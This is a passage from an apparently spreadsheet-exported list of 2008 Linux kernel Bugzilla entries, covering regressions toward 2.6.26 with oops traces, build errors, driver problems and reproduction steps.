  <si>
    <t>Subject : m68k libc5 regression Submitter : Geert Uytterhoeven &lt;geert@linux-m68k.org&gt; Date : 2008-05-26 20:38 References : http://marc.info/?l=linux-m68k&amp;m=121183429522754&amp;w=4 Handled-By : Jiri Kosina &lt;jkosina@suse.cz&gt; Patch : http://marc.info/?l=linux-kernel&amp;m=121184040730990&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>appletouch after wakeup</t>
  </si>
  <si>
    <t>2008-05-29 14:49 UTC</t>
  </si>
  <si>
    <t>2008-10-07 12:26 UTC</t>
  </si>
  <si>
    <t>Subject : appletouch after wakeup Submitter : "Justin Mattock" &lt;justinmattock@gmail.com&gt; Date : 2008-05-27 3:29 References : http://marc.info/?l=linux-kernel&amp;m=121185900618047&amp;w=4 Handled-By : Oliver Neukum &lt;oliver@neukum.org&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>NFS oops in 2.6.26rc4</t>
  </si>
  <si>
    <t>2008-05-29 14:53 UTC</t>
  </si>
  <si>
    <t>2008-06-24 00:55 UTC</t>
  </si>
  <si>
    <t>Subject : NFS oops in 2.6.26rc4 Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2008-05-27 19:04 References : http://marc.info/?l=linux-kernel&amp;m=121191548915522&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26rc4 GFS2 oops.</t>
  </si>
  <si>
    <t>2008-05-29 14:56 UTC</t>
  </si>
  <si>
    <t>2008-06-25 01:31 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26rc4 GFS2 oops. Submitter : Dave Jones &lt;davej@redhat.com&gt; Date : 2008-05-27 15:44 References : http://lkml.org/lkml/2008/5/27/297 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[2.6.25-git18 =&gt; 2.6.26-rc1-git1] Xorg crash with xf86MapVidMem error</t>
  </si>
  <si>
    <t>2008-05-29 15:02 UTC</t>
  </si>
  <si>
    <t>2009-01-19 01:38 UTC</t>
  </si>
  <si>
    <t>Subject : [2.6.25-git18 =&gt; 2.6.26-rc1-git1] Xorg crash with xf86MapVidMem error Submitter : Rufus &amp; Azrael &lt;rufus-azrael@numericable.fr&gt; Date : 2008-05-04 10:24 References : http://lkml.org/lkml/2008/5/4/37 Handled-By : Ingo Molnar &lt;mingo@elte.hu&gt; Handled-By : "H. Peter Anvin" &lt;hpa@zytor.com&gt; Handled-By : "Pallipadi, Venkatesh" &lt;venkatesh.pallipadi@intel.com&gt; Patch : http://lkml.org/lkml/2008/5/29/371 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sh/kernel/cpu/irq/intc-sh5.c build fix</t>
  </si>
  <si>
    <t>2.6.26-rc4-git</t>
  </si>
  <si>
    <t>2008-05-29 15:06 UTC</t>
  </si>
  <si>
    <t>2008-06-04 09:16 UTC</t>
  </si>
  <si>
    <t>Subject : sh/kernel/cpu/irq/intc-sh5.c build fix Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/5/29/492 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : http://lkml.org/lkml/2008/5/29/492</t>
  </si>
  <si>
    <t>two different oopses with 2.6.26-rc4</t>
  </si>
  <si>
    <t>2008-05-29 15:12 UTC</t>
  </si>
  <si>
    <t>2008-06-22 12:32 UTC</t>
  </si>
  <si>
    <t>Subject : two different oopses with 2.6.26-rc4 Submitter : Alejandro Riveira Fernández &lt;alejandro.riveira@gmail.com&gt; Date : 2008-05-28 9:50 References : http://marc.info/?l=linux-kernel&amp;m=121196833026310&amp;w=4 Handled-By : Johannes Berg &lt;johannes@sipsolutions.net&gt; Handled-By : Andrew Morton &lt;akpm@linux-foundation.org&gt; Handled-By : Peter Zijlstra &lt;a.p.zijlstra@chello.nl&gt; Patch : http://lkml.org/lkml/2008/5/20/683 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>test close</t>
  </si>
  <si>
    <t>2008-05-29 16:07 UTC</t>
  </si>
  <si>
    <t>test closing bug</t>
  </si>
  <si>
    <t>test close again</t>
  </si>
  <si>
    <t>2008-05-29 16:21 UTC</t>
  </si>
  <si>
    <t>ELO serial touchscreen driver unload issue</t>
  </si>
  <si>
    <t>2.6.26-rc4-git2</t>
  </si>
  <si>
    <t>2008-05-30 01:26 UTC</t>
  </si>
  <si>
    <t>2008-07-22 12:46 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: n/a Earliest failing kernel version: 2.6.26-rc4-git2 Distribution: opensuse 10.1 Hardware Environment: x86 / p4 /gigabyte mobo Software Environment: Problem Description: elo driver seems to have issues when unloading - at least on system without elo touchscreen attached [ 119.319962] BUG: unable to handle kernel paging request at f8cabfcc [ 119.319962] IP: [&lt;c0269171&gt;] driver_attach+0x3/0x16 [ 119.319962] *pde = 37e08067 *pte = 00000000 [ 119.319962] Oops: 0000 [#1] SMP [ 119.319962] Modules linked in: psmouse vboxdrv ipv6 button battery ac loop dm _mod md_mod mousedev evdev rtc_cmos rtc_core rtc_lib 8250_pnp e100 mii ehci_hcd uhci_hcd intel_agp usbcore agpgart i2c_i801 rng_core i2c_core iTCO_wdt iTCO_vend or_support parport_pc lp parport 8250 serial_core edd fan thermal processor ther mal_sys hwmon sg megaraid_mbox sr_mod cdrom megaraid_mm ata_piix libata dock sd_ mod scsi_mod [last unloaded: elo] [ 119.319962] [ 119.319962] Pid: 121, comm: kseriod Not tainted (2.6.26-rc4-git2 #1) [ 119.319962] EIP: 0060:[&lt;c0269171&gt;] EFLAGS: 00010246 CPU: 0 [ 119.319962] EIP is at driver_attach+0x3/0x16 [ 119.319962] EAX: f8cabfc8 EBX: f56adec0 ECX: f8cabfc8 EDX: 00000246 [ 119.319962] ESI: f78ec560 EDI: f8cabfa0 EBP: f7877fd0 ESP: f7877f84 [ 119.319962] DS: 007b ES: 007b FS: 00d8 GS: 0000 SS: 0068 [ 119.319962] Process kseriod (pid: 121, ti=f7877000 task=f786be80 task.ti=f787 7000) [ 119.319962] Stack: f7877fd0 c026d651 00000246 00000000 00000000 00000000 0000 0000 00000000 [ 119.319962] 00000001 f7819f28 f7819f2c 00000000 f786be80 c013262d f787 7fbc f7877fbc [ 119.319962] 00000000 c026d4f5 00000000 f7877fe0 c0132559 c013251e 0000 0000 00000000 [ 119.319962] Call Trace: [ 119.319962] [&lt;c026d651&gt;] ? serio_thread+0x15c/0x2f3 [ 119.319962] [&lt;c013262d&gt;] ? autoremove_wake_function+0x0/0x33 [ 119.319962] [&lt;c026d4f5&gt;] ? serio_thread+0x0/0x2f3 [ 119.319962] [&lt;c0132559&gt;] ? kthread+0x3b/0x62 [ 119.319962] [&lt;c013251e&gt;] ? kthread+0x0/0x62 [ 119.319962] [&lt;c0104443&gt;] ? kernel_thread_helper+0x7/0x10 [ 119.319962] ======================= [ 119.319962] Code: 5d c3 55 89 e5 56 8d b0 b8 00 00 00 53 89 c3 89 f0 e8 b1 c9 ec ff 89 d8 e8 6d ff ff ff 89 f0 e8 39 c9 ec ff 5b 5e 5d c3 55 89 c1 &lt;8b&gt; 40 04 89 e5 31 d2 68 70 93 26 c0 e8 23 fa ff ff c9 c3 55 89 [ 119.319962] EIP: [&lt;c0269171&gt;] driver_attach+0x3/0x16 SS:ESP 0068:f7877f84 [ 119.319962] ---[ end trace 9f13a3e20519fbdd ]--- Steps to reproduce: while true;do modprobe elo; echo -n load;modprobe -r elo;echo -n unload;done</t>
  </si>
  <si>
    <t>rpciod stuck in 'D' state</t>
  </si>
  <si>
    <t>2008-05-30 01:40 UTC</t>
  </si>
  <si>
    <t>2010-01-19 17:52 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Fedora 8 Hardware Environment: Software Environment: Problem Description: I have nfs mounts mounted via automount. Suddenly it stopped working. After short investigation, appeared that kernel helper thread stuck in 'D' state - refer attachement for "echo w &gt; /proc/sysrq-trigger" output Steps to reproduce:</t>
  </si>
  <si>
    <t>asm-m32r/uaccess.h must #include &lt;asm/setup.h&gt;</t>
  </si>
  <si>
    <t>2008-05-31 07:29 UTC</t>
  </si>
  <si>
    <t>2008-06-06 12:29 UTC</t>
  </si>
  <si>
    <t>Subject : asm-m32r/uaccess.h must #include &lt;asm/setup.h&gt; Submitter : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; References : http://lkml.org/lkml/2008/5/31/87 Handled-By : Adrian Bunk &lt;adrian.bunk@movial.fi&gt; Patch : http://lkml.org/lkml/2008/5/31/87</t>
  </si>
  <si>
    <t>Display artifacts on XOrg logout with PAT kernel and VESA framebuffer</t>
  </si>
  <si>
    <t>2008-05-31 14:04 UTC</t>
  </si>
  <si>
    <t>2008-11-19 04:51 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 Earliest failing kernel version: 2.6.26-rc1 Distribution: Debian Hardware Environment: Intel D945GCZ mainboard, Intel Pentium D 3.20GHz Video: 00:02.0 VGA compatible controller [0300]: Intel Corporation 82945G/GZ Integrated Graphics Controller [8086:2772] (rev 02) Software Environment: x86_64; Debian unstable First reported: http://lkml.org/lkml/2008/5/2/406 (the error messages reported in that mail have already been resolved) Problem Description: When CONFIG_X86_PAT is enabled and the VESA framebuffer is used for the console by booting with "vga=791", logging out of XOrg will result in artifacts (sometimes a 2cm band, sometimes covering most of the display) being displayed for a short time. Jesse Barnes has done some initial work on this issue, see: http://groups.google.co.uk/group/fa.linux.kernel/msg/f5bf9294bf744612 (cannot find that message on lkml.org) This patch proved insufficient to solve the issue.</t>
  </si>
  <si>
    <t>asus_laptop misses support for P30/P35, asus_acpi should not be marked deprecated</t>
  </si>
  <si>
    <t>2008-06-03 00:53 UTC</t>
  </si>
  <si>
    <t>Corentin Chary</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25 (asus_acpi) Earliest failing kernel version: 2.6.25 (asus_laptop) Distribution: Gentoo 2007.1 Hardware Environment: Samsung P35 XVM 1600 III Software Environment: Problem Description: asus_acpi gets marked deprecated. Look at: http://bugzilla.kernel.org/show_bug.cgi?id=10657 However, asus_laptop cant replace asus_acpi for all models which are supported throught that module. Looking at the sourcecode P30 is still metioned in the new module, but there are critical things missing or changed: \\_SB.PCI0.LPCB.EC0._Q10 should be \\_SB.PCI0.LPCB.EC0._Q0E for P30 Model, there is no _Q10 method at my dsdt. The P30 Fix is missing too, that the DSDT does not return a name in its init method, but looking at the oem_table_id it can be guessed that its a P30. So asus_laptop does not even detect the P30 anymore. The model_data model_conf struct in asus_acpi.c does provide the handles needed to get stuff working, although i dont know it things are so easy to port that to asus_laptop. The BIOS is broken yes, i know - but i cant fix this (i guess it is possible to edit my DSDT and make it working but the vendor should do that but Samsung wont do anything here :-|). As all P30 need this fix, i don't know why its even mentioned in the new driver as they wont work with the code as it is yet. I would like to see asus_acpi not marked deprecated until asus_laptop does provide the functions the "old" one does - if that is not possible, the "best" way imho is to let both of them coexist, marking none of them deprecated (i would not call it deprecated if the "new" one does not work with hardware the "old" one supports).</t>
  </si>
  <si>
    <t>vmalloc problem with DEBUG_PAGEALLOC config option</t>
  </si>
  <si>
    <t>2008-06-03 05:12 UTC</t>
  </si>
  <si>
    <t>2008-09-04 11:37 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Hardware Environment: Software Environment: Problem Description: http://lkml.org/lkml/2008/5/27/51 Steps to reproduce: Basicaly my test case looks like two shells - one is running loop of make install and another vgchage -an/y - this sometimes makes the nash crashing - and possibly during this segmentation fault something bad happens (the 'make install' loop must be restarted couple time as the first crash might not be the one where the problem starts)</t>
  </si>
  <si>
    <t>CDROM is nor detected with libata and 3Ware.</t>
  </si>
  <si>
    <t>2008-06-04 11:06 UTC</t>
  </si>
  <si>
    <t>2012-05-21 15:43 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.20 Earliest failing kernel version: 2.6.25 Distribution: Debian Lenny Hardware Environment: - CPU Intel Pentium 4 2.40GHz - 00:1f.1 IDE interface: Intel Corporation 82801EB/ER (ICH5/ICH5R) IDE Controller (rev 02) (prog-if 8a [Master SecP PriP]) Subsystem: ASUSTeK Computer Inc. Device 80a6 Flags: bus master, medium devsel, latency 0 I/O ports at 01f0 [size=8] I/O ports at 03f4 [size=1] I/O ports at 0170 [size=8] I/O ports at 0374 [size=1] I/O ports at fc00 [size=16] Memory at 70100000 (32-bit, non-prefetchable) [disabled] [size=1K] 02:09.0 RAID bus controller: 3ware Inc 7xxx/8xxx-series PATA/SATA-RAID (rev 01) Subsystem: 3ware Inc 7xxx/8xxx-series PATA/SATA-RAID Flags: bus master, 66MHz, medium devsel, latency 64, IRQ 21 I/O ports at df80 [size=16] Memory at fe6fbc00 (32-bit, non-prefetchable) [size=16] Memory at fd800000 (32-bit, non-prefetchable) [size=8M] Expansion ROM at 70020000 [disabled] [size=64K] Capabilities: [40] Power Management version 1 Kernel driver in use: 3w-xxxx Problem Description: Hi, I have a server with a Intel 82801EB/ER (ICH5/ICH5R) chipset and 3ware 7506-4LP PATA RAID controller. The hard disks are connected to the RAID card, the cdrom is connected to the ICH5 IDE controller on the motherboard. - With the kernel 2.6.20 and IDE support (CONFIG_IDE, CONFIG_BLK_DEV_IDECD) and 3Ware support (CONFIG_BLK_DEV_3W_XXXX_RAID) all works, cdrom is detected (/dev/hdd). - With the kernel 2.6.25 without the IDE support, with libata support (CONFIG_ATA, CONFIG_ATA_PIIX) and 3ware support (CONFIG_BLK_DEV_3W_XXXX_RAID), RAID array is detected and the system boot without problems, but the cdrom is not detected. Below the config files and dmesg for kernels 2.6.20 and 2.6.25. Regards.</t>
  </si>
  <si>
    <t>total system freeze at boot with 2.6.26-rc</t>
  </si>
  <si>
    <t>2008-06-05 12:38 UTC</t>
  </si>
  <si>
    <t>2008-07-06 08:55 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version:2.6.25.4 Earliest failing kernel version:2.6.24-rc4 also fails with -rc5 I was wating for, previous rcs not tested Distribution: Bluewhite64 (64 bits slackware) Hardware Environment: Athlon64 X2 / Ali 1689 north 1563 south + bt848 v4l + PATA and SATA disk (SATA on sata_uli) Seems to be related to sata disk detection (see below). Software Environment: none Problem Description: the computer freeze totally at boot after SATA disk detection. I append 2.6.25.4 dmesg, lspci and lsusb. The CPU is not 100% (otherwise I could hear the fan going crazy), the keayboard is dead (unable to scroll the console up or down). Nothings happen. The console shows somethings similar to the 2.6.25.4 logs, but hangs after those lines: hda: cache flushes not supported hda: hda1 hda2 hdd: ATAPI 40X DVD-ROM DVD-R-RAM CD-R/RW drive, 2048kB Cache Uniform CD-ROM driver Revision: 3.20 Driver 'sd' needs updating - please use bus_type methods sata_uli 0000:00:0e.1: version 1.3 ACPI: PCI Interrupt 0000:00:0e.1[A] -&gt; GSI 19 (level, low) -&gt; IRQ 19 scsi0 : sata_uli scsi1 : sata_uli ata1: SATA max UDMA/133 cmd 0xf80 ctl 0xf00 bmdma 0xd880 irq 19 ata2: SATA max UDMA/133 cmd 0xe80 ctl 0xe00 bmdma 0xd888 irq 19 ata1: SATA link up 1.5 Gbps (SStatus 113 SControl 300) &lt;-- here, 2.6.24 hangs --&gt; normal way for 2.6.25 : ata1.00: ATA-7: ST3200826AS, 3.06, max UDMA/133 ata1.00: 390721968 sectors, multi 16: LBA48 NCQ (depth 0/32) ata1.00: configured for UDMA/133 ata2: SATA link down (SStatus 0 SControl 300) scsi 0:0:0:0: Direct-Access ATA ST3200826AS 3.06 PQ: 0 ANSI: 5 sd 0:0:0:0: [sda] 390721968 512-byte hardware sectors (200050 MB) sd 0:0:0:0: [sda] Write Protect is off sd 0:0:0:0: [sda] Mode Sense: 00 3a 00 00 Steps to reproduce: Boot my PC :-) I guess any sata_uli device may hang the same way?</t>
  </si>
  <si>
    <t>forcedeth: lockdep warning on ethtool -s</t>
  </si>
  <si>
    <t>2008-06-05 14:30 UTC</t>
  </si>
  <si>
    <t>2008-07-13 12:52 UTC</t>
  </si>
  <si>
    <t>Subject : forcedeth: lockdep warning on ethtool -s Submitter : Tobias Diedrich &lt;ranma+kernel@tdiedrich.de&gt; Date : 2008-06-01 8:37 References : http://marc.info/?l=linux-kernel&amp;m=121230964032247&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[regression][bisected] ~90,000 wakeups as of 2.6.26-rc3</t>
  </si>
  <si>
    <t>2008-06-05 14:46 UTC</t>
  </si>
  <si>
    <t>2008-06-15 03:43 UTC</t>
  </si>
  <si>
    <t>Subject : [regression][bisected] ~90,000 wakeups as of 2.6.26-rc3 Submitter : Németh Márton &lt;nm127@freemail.hu&gt; Date : 2008-06-03 5:18 References : http://marc.info/?l=linux-kernel&amp;m=121247101601790&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops trying to mount an ntfs partition on thinkpad</t>
  </si>
  <si>
    <t>2.6.26-rc5</t>
  </si>
  <si>
    <t>2008-06-05 14:59 UTC</t>
  </si>
  <si>
    <t>2010-08-16 19:12 UTC</t>
  </si>
  <si>
    <t>Subject : Re: Linux 2.6.26-rc5 Submitter : Alex Romosan &lt;romosan@sycorax.lbl.gov&gt; Date : 2008-06-05 14:47 References : http://marc.info/?l=linux-kernel&amp;m=121267834421414&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops on loading ipaq module since 2.6.26, prevents use of device</t>
  </si>
  <si>
    <t>2008-06-05 17:39 UTC</t>
  </si>
  <si>
    <t>Adam Williamson</t>
  </si>
  <si>
    <t>2009-07-19 19:00 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25.4 Earliest failing kernel version: 2.6.26rc4 Distribution: Mandriva Linux Hardware Environment: i586 Software Environment: Problem Description: When testing Windows Mobile 2003 device synchronization, I noticed it was working fine on one system but not another. I then noticed the working system was running 2.6.24 and the broken was running 2.6.26, so went to narrow down the issue. After testing, I see that when I plug in the device under 2.6.26rc4, a kernel oops shows up in the logs. lshal output is rather different, synce-trayicon doesn't see the device, and synce-matchmaker complains about not being able to find a HAL property (it's looking at the wrong HAL device). Booting a 2.6.24 kernel, everything is fine. I then tried kernel 2.6.25.4, and again, everything is fine: no oops, synce-trayicon sees the device, so does synce-matchmaker. This is with stock kernel.org kernel (packaged in Mandriva as kernel-linus), not Mandriva's normal distro-patched kernel. So it's definitely your bug. :) I will attach the oops from /var/log/messages . I don't know what else might be useful - please advise and I'll try to help. I see only four changes to ipaq.c since October 2007, so hopefully it should be easy to pin this down. Steps to reproduce: Plug in an iPaq 1715 - USB ID 03f0:1016 - with kernel 2.6.26.</t>
  </si>
  <si>
    <t>radeonfb backlight config mismatch</t>
  </si>
  <si>
    <t>2008-06-06 03:47 UTC</t>
  </si>
  <si>
    <t>Gokdeniz Karadag</t>
  </si>
  <si>
    <t>2012-05-21 15:45 UTC</t>
  </si>
  <si>
    <t>serial/bfin_5xx.c build error</t>
  </si>
  <si>
    <t>2.6.26-rc5-git</t>
  </si>
  <si>
    <t>2008-06-06 09:24 UTC</t>
  </si>
  <si>
    <t>2008-06-10 01:32 UTC</t>
  </si>
  <si>
    <t>Subject : serial/bfin_5xx.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/6/6/277 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt;</t>
  </si>
  <si>
    <t>blackfin drivers/net/smc91x.c build error</t>
  </si>
  <si>
    <t>2008-06-06 09:25 UTC</t>
  </si>
  <si>
    <t>2008-06-12 01:35 UTC</t>
  </si>
  <si>
    <t>Subject : blackfin drivers/net/smc91x.c build error Submitter : Adrian Bunk &lt;bunk@kernel.org&gt; References : http://lkml.org/lkml/2008/6/6/278 Handled-By : Adrian Bunk &lt;bunk@kernel.org&gt; Patch : revert commit 099c736a470c8080a166e7a089f1e48e15f9947c</t>
  </si>
  <si>
    <t>Oops in nf_nat_setup_info</t>
  </si>
  <si>
    <t>2.6.24.7, 2.6.26-rc5</t>
  </si>
  <si>
    <t>2008-06-06 10:45 UTC</t>
  </si>
  <si>
    <t>2008-06-14 02:25 UTC</t>
  </si>
  <si>
    <t>NULL pointer dereference at virtual address 00000032</t>
  </si>
  <si>
    <t>Sami Liedes</t>
  </si>
  <si>
    <t>V7 FS: corrupted iso9660 fs recognized as V7 FS, causes BUG()</t>
  </si>
  <si>
    <t>2008-06-07 08:13 UTC</t>
  </si>
  <si>
    <t>2008-09-23 07:09 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian sid (unstable) Hardware Environment: qemu x86 Software Environment: Minimal Debian sid Problem Description: The attached files, which are actually (intentionally) corrupted iso9660 filesystems, are recognized as V7 FS, whatever that is. Attempts to use the filesystem then results in an oops, which probably doesn't speak highly of that filesystem's robustness against corrupted filesystems. Steps to reproduce: For hdb.10007430.gz: 1. gunzip the image 2. mount the image with mount hdb.10007430 /mnt -o loop (it should be recognized as V7 FS) 3. umount /mnt - oops For hdb.20005046.gz: 1. gunzip the image 2. mount the image with mount hdb.20005046 /mnt -o loop (it should be recognized as V7 FS) 3. cd /mnt 4. cat a/b - oops</t>
  </si>
  <si>
    <t>Different kernel crashes on corrupted filesystems</t>
  </si>
  <si>
    <t>2008-06-07 09:19 UTC</t>
  </si>
  <si>
    <t>2008-08-06 04:28 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: Earliest failing kernel version: Distribution: Debian sid (unstable) Hardware Environment: qemu x86 Software Environment: Minimal Debian sid Problem Description: The attached (intentionally) broken ext3 images break ext3 in different ways. Steps to reproduce: For hdb.25.softlockup.gz: 1. gunzip the image 2. mount hdb.25.softlockup /mnt -o loop 3. cd /mnt 4. find &gt;&amp;/dev/null -&gt; lockup For hdb.20000009.softlockup.gz: 1. gunzip the image 2. mount hdb.20000009.softlockup /mnt -o loop -&gt; orphan list check failed, lockup For hdb.20000057.nullderef.gz: 1. gunzip the image 2. mount hdb.20000057.nullderef /mnt -o loop 3. rm -rf /mnt -&gt; oops</t>
  </si>
  <si>
    <t>Kernel report fake device busy intermittently</t>
  </si>
  <si>
    <t>2008-06-09 03:41 UTC</t>
  </si>
  <si>
    <t>Masanari Iida</t>
  </si>
  <si>
    <t>2008-07-16 05:04 UTC</t>
  </si>
  <si>
    <t>Distribution: RHEL4 + vanilla kernel (2.6.25) Hardware Environment:TEAC DV-W28ECW Software Environment: Problem Description: When I access /proc/ide/hda/identify, following error is seen intermittently. kernel: hda: task_in_intr: status=0xd0 { Busy } kernel: hda: task_in_intr: error=0xd0LastFailedSense 0x0d Steps to reproduce: # cat /proc/ide/hda/identify This symptom occured very rare. (ex) 22 times in 60000 access. Analyze: After DVD drive return the identify data, the linux kernel wait 1ms to see if the drive status back to "Ready". But this TEAC DV-W28ECW drive, average retry count was 22 times. But in some cases, it exceed the 1ms (100 times), but it just takes a bit longer time... 6m sec. drivers/ide/ide-taskfile.c static u8 wait_drive_not_busy(ide_drive_t *drive) { int retries; u8 stat; /* * Last sector was transfered, wait until drive is ready. * This can take up to 10 usec, but we will wait max 1 ms. */ for (retries = 0; retries &lt; 100; retries++) { stat = ide_read_status(drive); if (stat &amp; BUSY_STAT) udelay(10); else break; } if (stat &amp; BUSY_STAT) printk(KERN_ERR "%s: drive still BUSY!\n", drive-&gt;name); return stat; } &gt; * Last sector was transfered, wait until drive is ready. &gt; * This can take up to 10 usec, but we will wait max 1 ms. This part is not documented within ATAPI specification. So the Drive vender never take care of the retry. In order to support some corner cases drive, I expect retry count in the loop need to be adjustable by /proc or /sys. Then just set the same value, 100 as a default.</t>
  </si>
  <si>
    <t>add wpa capable orinoco driver ( or simply replace existing )</t>
  </si>
  <si>
    <t>P1 enhancement</t>
  </si>
  <si>
    <t>2.6.25.4-10-pae</t>
  </si>
  <si>
    <t>2008-06-10 03:55 UTC</t>
  </si>
  <si>
    <t>Casual J Programmer</t>
  </si>
  <si>
    <t>2008-10-29 08:22 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: none Earliest failing kernel version: all Distribution: openSUSE / All Hardware Environment: x86 Lucent Agere ORiNOCO wireless card Software Environment: openSUSE / GNOME Problem Description: The orinoco_cs driver is not WPA capable. As it appears Agere did offer one one their website, alas it only did compile with very old kernels. Now some folks at http://ubuntuforums.org/showthread.php?t=304217&amp;page=10 fixed that. I suggest either the existing orinoco_cs is fixed or else the WPA capable one is added. Steps to reproduce: not applicable</t>
  </si>
  <si>
    <t>Disabling irq balance in kernel prevents laptop power off by sysrq</t>
  </si>
  <si>
    <t>2.6.25.6 SMP</t>
  </si>
  <si>
    <t>2008-06-12 04:40 UTC</t>
  </si>
  <si>
    <t>Rus</t>
  </si>
  <si>
    <t>2008-10-27 23:20 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: do not know Earliest failing kernel version: do not know Distribution: slackware-current Hardware Environment: laptop acer ferrari 1100 (amd x2 / sb 600) Software Environment: kernel sysrq Problem Description: Disabling irq balance in kernel prevents laptop power off by sysrq Steps to reproduce: 1. Compile kernel with irq balance enabled - sysrq-off is working 2. disable irq balance either with noirqbalance boot kernel option or in config (need recompiling) - sysrq-off do not works</t>
  </si>
  <si>
    <t>RTL8187 does not detect 8187b</t>
  </si>
  <si>
    <t>2008-06-12 14:56 UTC</t>
  </si>
  <si>
    <t>2008-11-12 08:32 UTC</t>
  </si>
  <si>
    <t>Distribution: Ubuntu Hi, plenty of Notebook Computers (e.g. Toshiba) use the RTL8187b chip as a builtin WLAN controller (USB 0bda:8198). Unfortunately, Linux does not support this chip yet. Maybe the differences between the RTL8187 and the RTL8187b are small enough that minor modification of the existing RTL8187 driver could make it work with that chip. regards</t>
  </si>
  <si>
    <t>ssh connections hang with 2.6.26-rc5</t>
  </si>
  <si>
    <t>2008-06-13 02:39 UTC</t>
  </si>
  <si>
    <t>Didier Raboud</t>
  </si>
  <si>
    <t>2008-06-19 01:29 UTC</t>
  </si>
  <si>
    <t>Latest working kernel version: 2.6.25-2 Earliest failing kernel version: 2.6.26-rc5 Distribution: Debian (Lenny + Sid) Hardware Environment: amd64 (Dell Latitude D630) Software Environment: KDE Problem Description: With kernel version 2.6.26-rc5, the ssh connections to remote servers randomly hang (no error message). No amelioration despite the activation of "ServerAliveInterval" on both sides. Steps to reproduce: Connect to a remote ssh server and do some stuff. After some time, the connection will hang. Please ask for details.</t>
  </si>
  <si>
    <t>2.6.26: x86/kernel/pci_dma.c: gfp |= __GFP_NORETRY ?</t>
  </si>
  <si>
    <t>2008-06-13 08:33 UTC</t>
  </si>
  <si>
    <t>2008-06-16 06:16 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26: x86/kernel/pci_dma.c: gfp |= __GFP_NORETRY ? Submitter : Miquel van Smoorenburg &lt;miquels@cistron.nl&gt; Date : 2008-05-21 13:30 References : http://lkml.org/lkml/2008/5/21/131 Handled-By : Glauber Costa &lt;gcosta@redhat.com&gt; Handled-By : Andi Kleen &lt;andi@firstfloor.org&gt; Handled-By : Miquel van Smoorenburg &lt;mikevs@xs4all.net&gt; Patch : http://lkml.org/lkml/2008/5/28/42 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>IPF Montvale machine panic when running a network-relevent testing</t>
  </si>
  <si>
    <t>IA-64</t>
  </si>
  <si>
    <t>2008-06-13 09:31 UTC</t>
  </si>
  <si>
    <t>2008-06-18 06:32 UTC</t>
  </si>
  <si>
    <t>platform_ia-64</t>
  </si>
  <si>
    <t>Subject : IPF Montvale machine panic when running a network-relevent testing Submitter : "Zhang, Yanmin" &lt;yanmin_zhang@linux.intel.com&gt; Date : 2008-06-13 8:19 References : http://marc.info/?l=linux-kernel&amp;m=121334523711437&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.26-rc6</t>
  </si>
  <si>
    <t>Dionisus Torimens</t>
  </si>
  <si>
    <t>2.6.26-rc5: SLUB debug, lockdep warning...</t>
  </si>
  <si>
    <t>2008-06-15 04:10 UTC</t>
  </si>
  <si>
    <t>2008-06-30 11:44 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.26-rc5: SLUB debug, lockdep warning... Submitter : "Daniel J Blueman" &lt;daniel.blueman@gmail.com&gt; Date : 2008-06-14 10:54 References : http://marc.info/?l=linux-kernel&amp;m=121344091109597&amp;w=4 Handled-By : "Vegard Nossum" &lt;vegard.nossum@gmail.com&gt; This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>[regression] display dimming is slow and laggy - Acer Travelmate 661lci</t>
  </si>
  <si>
    <t>2008-06-15 04:16 UTC</t>
  </si>
  <si>
    <t>2008-10-24 23:24 UTC</t>
  </si>
  <si>
    <t>Subject : [regression] display dimming is slow and laggy Submitter : Maximilian Engelhardt &lt;maxi@daemonizer.de&gt; Date : 2008-06-14 22:31 References : http://marc.info/?l=linux-kernel&amp;m=121348428828320&amp;w=4 This entry is being used for tracking a regression from 2.6.25. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>firewire: kernel locks up after bus generation roll-over</t>
  </si>
  <si>
